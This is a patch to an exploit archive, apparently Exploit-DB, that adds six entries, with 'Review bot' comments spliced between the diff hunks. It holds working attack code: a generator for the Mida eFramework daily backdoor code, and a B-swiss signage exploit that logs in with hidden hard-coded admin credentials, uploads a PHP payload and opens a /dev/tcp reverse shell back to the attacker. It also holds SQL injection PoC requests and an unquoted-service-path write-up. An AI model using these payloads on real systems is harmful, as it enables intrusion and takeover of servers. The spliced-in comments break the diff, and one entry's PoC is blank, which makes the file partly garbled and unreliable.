From 87f49d442732fcc3f2e81ba0510cc4fec9b65eac Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Tue, 22 Sep 2020 05:02:05 +0000
Subject: [PATCH] DB: 2020-09-22

6 changes to exploits/shellcodes

ForensiTAppxService 2.2.0.4 - 'ForensiTAppxService.exe' Unquoted Service Path
Online Shop Project 1.0 - 'p' SQL Injection
BlackCat CMS 1.3.6 - Cross-Site Request Forgery
Seat Reservation System 1.0 - 'id' SQL Injection
Mida eFramework 2.9.0 - Back Door Access
B-swiss 3 Digital Signage System 3.6.5 - Remote Code Execution
---
 exploits/hardware/webapps/48823.py | 70 ++++++
 exploits/multiple/webapps/48824.py | 346 +++++++++++++++++++++++++++++
 exploits/php/webapps/48819.txt | 27 +++
 exploits/php/webapps/48820.txt | 33 +++
 exploits/php/webapps/48822.txt | 28 +++
 exploits/windows/local/48821.txt | 35 +++
 files_exploits.csv | 6 +
 7 files changed, 545 insertions(+)
 create mode 100755 exploits/hardware/webapps/48823.py
 create mode 100755 exploits/multiple/webapps/48824.py
 create mode 100644 exploits/php/webapps/48819.txt
 create mode 100644 exploits/php/webapps/48820.txt
 create mode 100644 exploits/php/webapps/48822.txt
 create mode 100644 exploits/windows/local/48821.txt

diff --git a/exploits/hardware/webapps/48823.py b/exploits/hardware/webapps/48823.py
new file mode 100755
index 000000000..01ee1a3de
--- /dev/null
+++ b/exploits/hardware/webapps/48823.py
@@ -0,0 +1,70 @@
+# Exploit Title: Mida eFramework 2.9.0 - Back Door Access
+# Google Dork: Server: Mida eFramework
+# Date: 2020-08-27
+# Exploit Author: elbae
+# Vendor Homepage: https://www.midasolutions.com/
+# Software Link: http://ova-efw.midasolutions.com/
+# Reference: https://elbae.github.io/jekyll/update/2020/07/14/vulns-01.html
+# Version: <= 2.9.0
+# CVE : CVE-2020-15921
+
+
+#! /usr/bin/python3
+# -*- coding: utf-8 -*-
+
+from datetime import date
+
+def print_disclaimer():
+print("""
+---------------------
+Disclaimer:
+1) For testing purpose only.
+2) Do not attack production environments.
+3) Intended for educational purposes only and cannot be used for law
+violation or personal gain.
+4) The author is not responsible for any possible harm caused by this
+material.
+---------------------""")
+
+def print_info():
+print("""
+[*] Mida Solutions eFramework PDC Administrative Back-Door access
+(CVE-2020-15921)
+[*] Reference:
+https://elbae.github.io/jekyll/update/2020/07/14/vulns-01.html
+[*] This script can be used to retrieve the code which gives you the
+possibility to change the password.
+[*] How it works:
+1) run the script
+2) copy the output to the URL you want to access (i.e.
+http://192.168.1.60:8090/PDC/extreq.php?code=THE-CODE)
+3) change the password
+4) access as admin with the password """)
+
+def main():
+print_info()
+print_disclaimer()
+abc = ['a', 'b', 'c', 'd', 'e', 'f', 'g',
+'h', 'i', 'j', 'k', 'l', 'm', 'n',
+'o', 'p', 'q', 'r', 's', 't', 'u',
+'v', 'w', 'x', 'y', 'z']
+baseString = 'midasoluti' # default value from source code
+today = date.today()
+dateString = "{}0{:02d}0{}".format(today.day, today.month, today.year)
+retString = ""
+
+for i in range(0,len(baseString)):
+n = int(abc.index(baseString[i]))
+m = int(dateString[i])
+s = n+m
+if (s >= len(abc)):
+s = m
+retString += abc[s]
+print("[+] Generated code: {}".format(retString))
+print("[?] Example URL: http://target:8090/PDC/extreq.php?code={0}
+".format(retString))
+print("[?] Example URL: https://target/PDC/extreq.php?code={0}
+".format(retString))
+
+if __name__ == '__main__':
+main()
\ No newline at end of file
diff --git a/exploits/multiple/webapps/48824.py b/exploits/multiple/webapps/48824.py
new file mode 100755
index 000000000..c14042b55
--- /dev/null
+++ b/exploits/multiple/webapps/48824.py
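Review bot: The `#! /usr/bin/python3` and `# -*- coding: utf-8 -*-` lines sit at lines 12–13, below the header comments, so neither takes effect — a shebang is honoured only on line 1 and a coding declaration only on line 1 or 2; they belong above the `# Exploit Title:` block. As committed the bodies of `print_disclaimer`, `print_info` and `main` are flush with their `def` lines (`+def print_disclaimer():` is followed directly by `+print("""`), which does not parse, so it looks like the indentation was lost on submission and the stored file is not what the author ran. The script has no module docstring; one stating that the code is derived from the constant `midasoluti` and `date.today()` (so it changes daily) and is submitted to `/PDC/extreq.php?code=` would give a responder the request path to look for in web server logs.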
@@ -0,0 +1,346 @@ +# Exploit Title: B-swiss 3 Digital Signage System 3.6.5 - Remote Code Execution +# Date: 2020-08-27 +# Exploit Author: LiquidWorm +# Vendor Homepage: https://www.b-swiss.com +# Version: <= 3.6.5 +# CVE : N/A + + +#!/usr/bin/env python3 +# -*- coding: utf-8 -*- +# +# +# B-swiss 3 Digital Signage System 3.6.5 Backdoor Remote Code Execution +# +# +# Vendor: B-Swiss SARL | b-tween Sarl +# Product web page: https://www.b-swiss.com +# Affected version: 3.6.5 +# 3.6.2 +# 3.6.1 +# 3.6.0 +# 3.5.80 +# 3.5.40 +# 3.5.20 +# 3.5.00 +# 3.2.00 +# 3.1.00 +# +# Summary: Intelligent digital signage made easy. To go beyond the +# possibilities offered, b-swiss allows you to create the communication +# solution for your specific needs and your graphic charter. You benefit +# from our experience and know-how in the realization of your digital +# signage project. +# +# Desc: The application suffers from an "authenticated" arbitrary +# PHP code execution. The vulnerability is caused due to the improper +# verification of uploaded files in 'index.php' script thru the 'rec_poza' +# POST parameter. This can be exploited to execute arbitrary PHP code +# by uploading a malicious PHP script file that will be stored in +# '/usr/users' directory. Due to an undocumented and hidden "maintenance" +# account 'admin_m' which has the highest privileges in the application, +# an attacker can use these hard-coded credentials to authenticate and +# use the vulnerable image upload functionality to execute code on the +# server. +# +# ======================================================================================== +# lqwrm@metalgear:~/prive$ python3 sign2.py 192.168.10.11 192.168.10.22 7777 +# [*] Checking target... +# [*] Good to go! +# [*] Checking for previous attempts... +# [*] All good. +# [*] Getting backdoor session... 
+# [*] Got master backdoor cookie: 0c1617103c6f50107d09cb94b3eafeb2 +# [*] Starting callback listener child thread +# [*] Starting handler on port 7777 +# [*] Adding GUI credentials: test:123456 +# [*] Executing and deleting stager file +# [*] Connection from 192.168.10.11:40080 +# [*] You got shell! +# id ; uname -or +# uid=33(www-data) gid=33(www-data) groups=33(www-data) +# 4.15.0-20-generic GNU/Linux +# exit +# *** Connection closed by remote host *** +# [?] Want me to remove the GUI credentials? y +# [*] Removing... +# [*] t00t! +# lqwrm@metalgear:~/prive$ +# ======================================================================================== +# +# Tested on: Linux 5.3.0-46-generic x86_64 +# Linux 4.15.0-20-generic x86_64 +# Linux 4.9.78-xxxx-std-ipv6-64 +# Linux 4.7.0-040700-generic x86_64 +# Linux 4.2.0-27-generic x86_64 +# Linux 3.19.0-47-generic x86_64 +# Linux 2.6.32-5-amd64 x86_64 +# Darwin 17.6.0 root:xnu-4570.61.1~1 x86_64 +# macOS 10.13.5 +# Microsoft Windows 7 Business Edition SP1 i586 +# Apache/2.4.29 (Ubuntu) +# Apache/2.4.18 (Ubuntu) +# Apache/2.4.7 (Ubuntu) +# Apache/2.2.22 (Win64) +# Apache/2.4.18 (Ubuntu) +# Apache/2.2.16 (Debian) +# PHP/7.2.24-0ubuntu0.18.04.6 +# PHP/5.6.40-26+ubuntu18.04.1+deb.sury.org+1 +# PHP/5.6.33-1+ubuntu16.04.1+deb.sury.org+1 +# PHP/5.6.31 +# PHP/5.6.30-10+deb.sury.org~xenial+2 +# PHP/5.5.9-1ubuntu4.17 +# PHP/5.5.9-1ubuntu4.14 +# PHP/5.3.10 +# PHP/5.3.13 +# PHP/5.3.3-7+squeeze16 +# PHP/5.3.3-7+squeeze17 +# MySQL/5.5.49 +# MySQL/5.5.47 +# MySQL/5.5.40 +# MySQL/5.5.30 +# MySQL/5.1.66 +# MySQL/5.1.49 +# MySQL/5.0.77 +# MySQL/5.0.12-dev +# MySQL/5.0.11-dev +# MySQL/5.0.8-dev +# phpMyAdmin/3.5.7 +# phpMyAdmin/3.4.10.1deb1 +# phpMyAdmin/3.4.7 +# phpMyAdmin/3.3.7deb7 +# WampServer 3.2.0 +# Acore Framework 2.0 +# +# +# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic +# Macedonian Information Security Research and Development Laboratory +# Zero Science Lab - https://www.zeroscience.mk - @zeroscience +# +# +# Advisory 
ID: ZSL-2020-5590 +# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5590.php +# +# +# 13.06.2020 +# + +from http.cookiejar import DefaultCookiePolicy# #yciloPeikooCtluafeD tropmi rajeikooc.ptth mofr +from http.cookiejar import CookieJar# oOo #raJeikooC tropmi rajeikooc.ptth mofr +from six.moves import input# #-----------------+-----------------# #tupni trompi sevom.xis morf +from time import sleep# | 01 | 04 | #peels trompi emit morf +import urllib.request# | | | | #tseuqer.billru tropmi +import urllib.parse# | | | | #esrap.billru tropmi +import telnetlib# | | | #biltenlet tropmi +import threading# | | | | #gnidaerht tropmi +import requests# | | | | #stseuqer tropmi +import socket# | | o | #tekcos tropmi +import sys,re# | | | #er,sys tropmi +############## #-----------------+-----------------# ############## +############### oOo ############### +################ | ################ +#################### Y #################### +############################ _ ############################ +############################################################################################### + +class Sign: + + def __init__(self): + self.username = b"\x61\x64\x6d\x69\x6e\x5f\x6d" + self.altruser = b"\x62\x2d\x73\x77\x69\x73\x73" + self.password = b"\x44\x50\x36\x25\x57\x33\x64" + self.agent = "SignageBot/1.02" + self.fileid = "251" + self.payload = None + self.answer = False + self.params = None + self.rhost = None + self.lhost = None + self.lport = None + self.send = None + + def env(self): + if len(sys.argv) != 4: + self.usage() + else: + self.rhost = sys.argv[1] + self.lhost = sys.argv[2] + self.lport = int(sys.argv[3]) + if not "http" in self.rhost: + self.rhost = "http://{}".format(self.rhost) + + def usage(self): + self.roger() + print("Usage: python3 {} ".format(sys.argv[0])) + print("Example: python3 {} 192.168.10.11:80 192.168.10.22 7777\n".format(sys.argv[0])) + exit(0) + + def roger(self): + waddup = """ + ____________________ + / \\ + ! 
B-swiss 3 ! + ! RCE ! + \____________________/ + ! ! + ! ! + L_ ! + / _)! + / /__L +____________/ (____) + (____) +____________ (____) + \_(____) + ! ! + ! ! + \__/ + """ + print(waddup) + + def test(self): + print("[*] Checking target...") + try: + r = requests.get(self.rhost) + response = r.text + if not "B-swiss" in response: + print("[!] Not a b-swiss system") + exit(0) + if "B-swiss" in response: + print("[*] Good to go!") + next + else: + exit(-251) + except Exception as e: + print("[!] Ney ney: {msg}".format(msg=e)) + exit(-1) + + def login(self): + token = "" + cj = CookieJar() + self.params = {"locator" : "visitor.ProcessLogin", + "username" : self.username, + "password" : self.password, + "x" : "0", + "y" : "0"} + + damato = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cj)) + damato.addheaders.pop() + damato.addheaders.append(("User-Agent", self.agent)) + + try: + print("[*] Getting backdoor session...") + damato.open(self.rhost + "/index.php", urllib.parse.urlencode(self.params).encode('utf-8')) + for cookie in cj: + token = cookie.value + print("[*] Got master backdoor cookie: "+token) + except urllib.request.URLError as e: + print("[!] 
Connection error: {}".format(e.reason)) + + return token + + def upload(self): + j = "\r\n" + self.cookies = {"PNU_RAD_LIB" : self.rtoken} + self.headers = {"Cache-Control" : "max-age=0", + "Content-Type" : "multipart/form-data; boundary=----j", + "User-Agent" : self.agent, + "Accept-Encoding" : "gzip, deflate", + "Accept-Language" : "en-US,en;q=0.9", + "Connection" : "close"} + + self.payload = " /dev/tcp/"+self.lhost+"/"+str(self.lport)+" <&1;rm "+self.fileid+".php'\");" + + print("[*] Adding GUI credentials: test:123456") + # rec_adminlevel values: + # ---------------------- + # 100000 - "b-swiss Maintenance Admin" (Undocumented privilege) + # 7 - "B-swiss admin" <---------------------------------------------------------------------------------------+ + # 8 - Other | + # | + self.send = "------j{}Content-Disposition: form-data; ".format(j)# | + self.send += "name=\"locator\"{}Users.Save{}------j{}Content-Disposition: form-data; ".format(j*2,j,j)# | + self.send += "name=\"page\"{}------j{}Content-Disposition: form-data; ".format(j*3,j)# | + self.send += "name=\"sort\"{}------j{}Content-Disposition: form-data; ".format(j*3,j)# | + self.send += "name=\"id\"{}{}{}------j\r\nContent-Disposition: form-data; ".format(j*2,self.fileid,j,j)# | + self.send += "name=\"ischildgrid\"{}------j{}Content-Disposition: form-data; ".format(j*3,j)# | + self.send += "name=\"inpopup\"{}------j{}Content-Disposition: form-data; ".format(j*3,j)# | + self.send += "name=\"ongridpage\"{}------j{}Content-Disposition: form-data; ".format(j*3,j)# | + self.send += "name=\"rowid\"{}------j{}Content-Disposition: form-data; ".format(j*3,j)# | + self.send += "name=\"preview_screenid\"{}------j{}Content-Disposition: form-data; ".format(j*3,j)# | + self.send += "name=\"rec_firstname\"{}TestF{}------j{}Content-Disposition: form-data; ".format(j*2,j,j)# | + self.send += "name=\"rec_lastname\"{}TestL{}------j{}Content-Disposition: form-data; ".format(j*2,j,2)# | + self.send += 
"name=\"rec_email\"{}test@test.cc{}------j{}Content-Disposition: form-data; ".format(j*2,j,j)# | + self.send += "name=\"rec_username\"{}test{}------j{}Content-Disposition: form-data; ".format(j*2,j,j)# | + self.send += "name=\"rec_password\"{}123456{}------j{}Content-Disposition: form-data; ".format(j*2,j,j)# | + self.send += "name=\"rec_cpassword\"{}123456{}------j{}Content-Disposition: form-data; ".format(j*2,j,j)# | + self.send += "name=\"rec_adminlevel\"{}7{}------j{}Content-Disposition: form-data; ".format(j*2,j,j)# <----------+ + self.send += "name=\"rec_status\"{}1{}------j{}Content-Disposition: form-data; ".format(j*2,j,j) + self.send += "name=\"rec_poza\"; filename=\"Blank.jpg.php\"{}Content-Type: application/octet-stream{}".format(j,j*2) + self.send += self.payload+"{}------j{}Content-Disposition: form-data; ".format(j,j) + self.send += "name=\"rec_poza_face\"{}C:\\fakepath\\Blank.jpg{}------j{}Content-Disposition: form-data; ".format(j*2,j,j) + self.send += "name=\"rec_language\"{}french-sw{}------j{}Content-Disposition: form-data; ".format(j*2,j,j) + self.send += "name=\"rec_languages[]\"{}2{}------j{}Content-Disposition: form-data; ".format(j*2,j,j) + self.send += "name=\"rec_can_change_password\"{}1{}------j--{}".format(j*2,j,j) + + requests.post(self.rhost+"/index.php", headers=self.headers, cookies=self.cookies, data=self.send) + print("[*] Executing and deleting stager file") + r = requests.get(self.rhost+"/usr/users/"+self.fileid+".php") + sleep(1) + + self.answer = input("[?] Want me to remove the GUI credentials? 
").strip() + if self.answer[0] == "y" or self.answer[0] == "Y": + print("[*] Removing...") + requests.get(self.rhost+"/index.php?locator=Users.Delete&id="+self.fileid, headers=self.headers, cookies=self.cookies) + if self.answer[0] == "n" or self.answer[0] == "N": + print("[*] Cool!") + print("[*] t00t!") + exit(-1) + + def razmisluju(self): + print("[*] Starting callback listener child thread") + konac = threading.Thread(name="ZSL", target=self.phone) + konac.start() + sleep(1) + self.upload() + + def fish(self): + r = requests.get(self.rhost+"/usr/users/", verify=False, allow_redirects=False) + response = r.text + print("[*] Checking for previous attempts...") + if not ".php" in response: + print("[*] All good.") + elif "251.php" in response: + print("[!] Stager file \"{}.php\" still present on the server".format(self.fileid)) + + def phone(self): + telnetus = telnetlib.Telnet() + print("[*] Starting handler on port {}".format(self.lport)) + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.bind(("0.0.0.0", self.lport)) + while True: + try: + s.settimeout(7) + s.listen(1) + conn, addr = s.accept() + print("[*] Connection from {}:{}".format(addr[0], addr[1])) + telnetus.sock = conn + except socket.timeout as p: + print("[!] No outgoing calls :( ({msg})".format(msg=p)) + print("[+] Check your port mappings or increase timeout") + s.close() + exit(0) + break + + print("[*] You got shell!") + telnetus.interact() + conn.close() + + def main(self): + self.env() + self.test() + self.fish() + self.rtoken = self.login() + self.razmisluju() + +if __name__ == '__main__': + Sign().main() \ No newline at end of file diff --git a/exploits/php/webapps/48819.txt b/exploits/php/webapps/48819.txt new file mode 100644 index 000000000..7c2b5bc3c --- /dev/null +++ b/exploits/php/webapps/48819.txt 
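Review bot: In `test()` the bare `next` under `if "B-swiss" in response:` is an expression statement that looks up the builtin and discards it — it is not a `continue` and does nothing, so it should be dropped; the `else: exit(-251)` branch is unreachable in any case because the preceding `if not "B-swiss" in response:` already exits on the only input that could reach it. `from six.moves import input` adds a third-party package for what is the builtin `input` on the python3 the shebang names, and `telnetlib` in `phone()` is deprecated since Python 3.11 and removed in 3.13. `Sign` has no docstring; one should record the persistent traces a run leaves on the target, which is what an incident responder reading this entry needs: a GUI user `test` created at `rec_adminlevel` 7 that is removed only when the operator answers `y`, and the `251.php` file under `/usr/users/` that the payload removes itself with `rm`.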
@@ -0,0 +1,27 @@
+# Exploit Title: Online Shop Project 1.0 - 'p' SQL Injection
+# Date: 2020-09-20
+# Exploit Author: Augkim
+# Vendor Homepage: https://www.sourcecodester.com/php/14448/online-shop-project-using-phpmysql.html
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/online-shop-using-php.zip
+# Tested on: Apache2
+
+
+GET
+/shop/product.php?p=2%20UNION%20ALL%20SELECT%201,2,3,4,@@datadir,6,7,8--%20-
+HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0)
+Gecko/20100101 Firefox/80.0
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: ko-KR,ko;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Connection: close
+Cookie: PHPSESSID=lmuj4akmh6q1flmcbnuisgttom
+Upgrade-Insecure-Requests: 1
+Cache-Control: max-age=0
+Origin: foo.example.org
+
+
+PoC:
+/URL/product.php?p=2%20UNION%20ALL%20SELECT%201,2,3,4,@@datadir,6,7,8--%20-
\ No newline at end of file
diff --git a/exploits/php/webapps/48820.txt b/exploits/php/webapps/48820.txt
new file mode 100644
index 000000000..05c1aaa63
--- /dev/null
+++ b/exploits/php/webapps/48820.txt
@@ -0,0 +1,33 @@
+# Exploit Title: BlackCat CMS 1.3.6 - Cross-Site Request Forgery
+# Date: 2020-06-01
+# Exploit Author: Noth
+# Vendor Homepage: https://github.com/BlackCatDevelopment/BlackCatCMS
+# Software Link: https://github.com/BlackCatDevelopment/BlackCatCMS
+# Version: v1.3.6
+# CVE : CVE-2020-25453
+
+BlackCat CMS v1.3.6 has a CSRF vulnerability (bypass csrf_token) that
+allows remote arbitrary code execution .
+
+PoC (Remove the csrf_token value) :
+
+
+-------------------------------------------------------------------------------------------------------------------------------------------------
+
+
+
+
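Review bot: The request line is wrapped — `GET`, the path and `HTTP/1.1` are on three separate lines, and `User-Agent:` and `Accept:` are split from their values — so what is stored is not the request as sent; 48822.txt in this commit has the same wrapping, and both should be re-flowed to one line per request line and header. `Origin: foo.example.org` on a plain GET plays no part in the PoC and looks like a leftover from a proxy template. The header block lacks a `Version:` line although the title names 1.0, and nothing says where `p` reaches the query inside `product.php`; a one-line pointer to the vulnerable statement would make the entry usable for remediation rather than only for reproduction.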
+
+
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/exploits/php/webapps/48822.txt b/exploits/php/webapps/48822.txt
new file mode 100644
index 000000000..ba8e2eed3
--- /dev/null
+++ b/exploits/php/webapps/48822.txt
@@ -0,0 +1,28 @@
+# Exploit Title: Seat Reservation System 1.0 - 'id' SQL Injection
+# Date: 2020-09-20
+# Exploit Author: Augkim
+# Vendor Homepage: https://www.sourcecodester.com/php/14452/seat-reservation-system-movie-theater-project-using-phpmysql.html
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/seat-reservation-system-using-php_0.zip
+# Tested on: Apache2
+
+
+POST
+/URL/index.php?page=reserve&id=''union%20select%201,version(),3,4,5,6,7,8--
+HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0)
+Gecko/20100101 Firefox/80.0
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: ko-KR,ko;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Referer: http://localhost/sere/
+Connection: close
+Cookie: PHPSESSID=lmuj4akmh6q1flmcbnuisgttom
+Upgrade-Insecure-Requests: 1
+Cache-Control: max-age=0
+Origin: foo.example.org
+
+
+PoC:
+/URL/index.php?page=reserve&id=''union%20select%201,version(),3,4,5,6,7,8--
\ No newline at end of file
diff --git a/exploits/windows/local/48821.txt b/exploits/windows/local/48821.txt
new file mode 100644
index 000000000..af37159bf
--- /dev/null
+++ b/exploits/windows/local/48821.txt
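Review bot: Everything after the `-----` separator in 48820.txt is an empty added line, so the record carries no PoC even though `PoC (Remove the csrf_token value) :` announces one; presumably the HTML form was stripped somewhere between submission and this copy, and the stored file should be checked against the 33 lines the hunk header declares. The description also says the forged request reaches "remote arbitrary code execution" without naming the action it targets, which is the one fact a maintainer needs to locate the handler that skips the token check and a reader needs to rate impact; a header line such as `# Affected action: <handler or locator name>` would cover it.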
@@ -0,0 +1,35 @@
+# Exploit Title: ForensiTAppxService 2.2.0.4 - 'ForensiTAppxService.exe' Unquoted Service Path
+# Discovery by: Burhanettin Özgenç
+# Discovery Date: 2020-09-15
+# Vendor Homepage: https://www.forensit.com/downloads.html
+# Tested Version: 2.2.0.4
+# Vulnerability Type: Unquoted Service Path
+# Tested on OS: Windows 10 Pro x64
+
+# Step to discover Unquoted Service Path:
+
+C:\>wmic service get name, pathname, displayname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "ForensiTAppxService" | findstr /i /v """
+
+ForensiT AppX Management Service ForensiTAppxService C:\Program Files (x86)\ForensiT\AppX Management Service\ForensiTAppxService.exe Auto
+
+# Service info:
+
+C:\>sc qc ForensiTAppxService
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: ForensiTAppxService
+ TYPE : 10 WIN32_OWN_PROCESS
+ START_TYPE : 2 AUTO_START
+ ERROR_CONTROL : 1 NORMAL
+ BINARY_PATH_NAME : C:\Program Files (x86)\ForensiT\AppX Management Service\ForensiTAppxService.exe
+ LOAD_ORDER_GROUP :
+ TAG : 0
+ DISPLAY_NAME : ForensiT AppX Management Service
+ DEPENDENCIES :
+ SERVICE_START_NAME : LocalSystem
+
+# Exploit:
+# A successful attempt would require the local user to be able to insert their code in the system
+# root path undetected by the OS or other security applications where it could potentially be executed
+# during application startup or reboot. If successful, the local user's code would execute with
+# the elevated privileges of the application.
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 059414708..17720c850 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
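Review bot: The `# Exploit:` paragraph is boilerplate and leaves out the actual prerequisite: with an unquoted `BINARY_PATH_NAME` the risk only materialises if a standard user can write into one of the directories along `C:\Program Files (x86)\ForensiT\AppX Management Service\`, and on a default Windows 10 install those locations are typically not user-writable, so the entry should record the ACLs it was tested against (`icacls` output for each path segment) or state that they were not checked. The remediation is also absent; the fix is to quote the image path in the service configuration, e.g. `sc config ForensiTAppxService binPath= "\"C:\Program Files (x86)\ForensiT\AppX Management Service\ForensiTAppxService.exe\""`, and a header line on whether the vendor was notified would normally accompany a finding published under a real product name.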
@@ -10382,6 +10382,7 @@ id,file,description,date,author,type,platform,port
 48808,exploits/windows/local/48808.txt,"Rapid7 Nexpose Installer 6.6.39 - 'nexposeengine' Unquoted Service Path",2020-09-14,LiquidWorm,local,windows,
 48810,exploits/windows/local/48810.txt,"Pearson Vue VTS 2.3.1911 Installer - 'VUEApplicationWrapper' Unquoted Service Path",2020-09-14,Jok3r,local,windows,
 48815,exploits/windows/local/48815.txt,"Windows TCPIP Finger Command - C2 Channel and Bypassing Security Software",2020-09-16,hyp3rlinx,local,windows,
+48821,exploits/windows/local/48821.txt,"ForensiTAppxService 2.2.0.4 - 'ForensiTAppxService.exe' Unquoted Service Path",2020-09-21,"Burhanettin Ozgenc",local,windows,
 42887,exploits/linux/local/42887.c,"Linux Kernel 3.10.0-514.21.2.el7.x86_64 / 3.10.0-514.26.1.el7.x86_64 (CentOS 7) - SUID Position Independent Executable 'PIE' Local Privilege Escalation",2017-09-26,"Qualys Corporation",local,linux,
 42890,exploits/windows/local/42890.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Image File Execution Bypass",2017-09-28,hyp3rlinx,local,windows,
 42918,exploits/windows/local/42918.py,"DiskBoss Enterprise 8.4.16 - 'Import Command' Local Buffer Overflow",2017-09-28,"Touhid M.Shaikh",local,windows,
@@ -40643,6 +40644,11 @@ id,file,description,date,author,type,platform,port
 48814,exploits/php/webapps/48814.txt,"Piwigo 2.10.1 - Cross Site Scripting",2020-09-16,Iridium,webapps,php,
 48817,exploits/multiple/webapps/48817.py,"SpamTitan 7.07 - Remote Code Execution (Authenticated)",2020-09-18,"Felipe Molina",webapps,multiple,
 48818,exploits/php/webapps/48818.py,"Mantis Bug Tracker 2.3.0 - Remote Code Execution (Unauthenticated)",2020-09-18,"Nikolas Geiselman",webapps,php,
+48819,exploits/php/webapps/48819.txt,"Online Shop Project 1.0 - 'p' SQL Injection",2020-09-21,Augkim,webapps,php,
+48820,exploits/php/webapps/48820.txt,"BlackCat CMS 1.3.6 - Cross-Site Request Forgery",2020-09-21,Noth,webapps,php,
+48822,exploits/php/webapps/48822.txt,"Seat Reservation System 1.0 - 'id' SQL Injection",2020-09-21,Augkim,webapps,php,
+48823,exploits/hardware/webapps/48823.py,"Mida eFramework 2.9.0 - Back Door Access",2020-09-21,elbae,webapps,hardware,
+48824,exploits/multiple/webapps/48824.py,"B-swiss 3 Digital Signage System 3.6.5 - Remote Code Execution",2020-09-21,LiquidWorm,webapps,multiple,
 42884,exploits/multiple/webapps/42884.py,"Fibaro Home Center 2 - Remote Command Execution / Privilege Escalation",2017-02-22,forsec,webapps,multiple,
 42805,exploits/php/webapps/42805.txt,"WordPress Plugin WPAMS - SQL Injection",2017-09-26,"Ihsan Sencan",webapps,php,
 42889,exploits/php/webapps/42889.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Private Key Disclosure",2017-09-28,hyp3rlinx,webapps,php,